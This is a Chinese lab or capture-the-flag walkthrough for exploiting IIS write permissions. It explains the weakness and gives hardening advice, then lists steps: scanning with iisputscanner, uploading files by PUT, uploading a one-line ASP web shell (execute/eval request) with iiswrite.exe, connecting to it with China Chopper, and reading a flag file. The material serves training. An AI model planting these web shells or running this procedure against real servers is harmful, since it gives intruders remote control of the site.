题目11:IIS write漏洞利用

合集下载
相关主题
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

关卡十一

题目:IIS Write漏洞利用

关卡描述:

IIS写权限对网站系统的安全是致命的,拥有写权限可以直接往网站目录写文件,在拥有写权限的服务器上,其安全相对设置薄弱,因此比较容易被入侵者控制。写权限漏洞严格意义上讲其实不算是漏洞,因为网站内容始终是要进行编辑和修改的。只有对文件的权限分配不慎才会造成写权限被利用,进而被植入木马等情况的发生。

建议:

1、如果是纯静态页网站,请不要添加写入与删除功能,那么你的空间就是百毒不侵。

2、如果有写入权限,无修改与删除功能,那么你的网站也是非常安全的,就算有入侵它所有写入的文件都不能更改(留下足迹)而你网站本身的文件也是相当安全。唯一的是可能会写入很多垃圾文件。

3、如果有修改权限,那么与有删除权限其实是一样的。因为一个文件就算删除不了,我把内容清空那与删除这个文件是一样的效果。所以分配这些权限需要小心谨慎。

答案提交:

1、请提交获取的KEY值。

参考步骤:

1.进入关卡十一:

2.获取目标主机ip地址

3.打开工具场景windows xp

4.C:\tools\12.漏洞利用工具\iis写权限漏洞\下iisputscanner.exe进行扫描

5.目标系统中搭建网站存在该漏洞,鼠标右击会看到浏览、上传、导出等选项

6.选择put file测试一下,默认有该软件作者写的一个alert.txt文件,点击put,提示上传成功.如图:

打开浏览器访问目标主机ip/alert.txt,发现确实已经有该文件,且内容和软件里的一致

但是直接通过该软件写个asp木马上传是不行的。

使用iiswrite.exe上传内容为<%execute (request("lele"))%> 的文本文件## <%eval request(“a”)%>

在桌面先新建一个aa.txt文档,内容如下

然后通过使用iiswrite.exe上传文本文件。

菜刀连接一句话木马

C盘根目录发现Flag.txt

相关文档
最新文档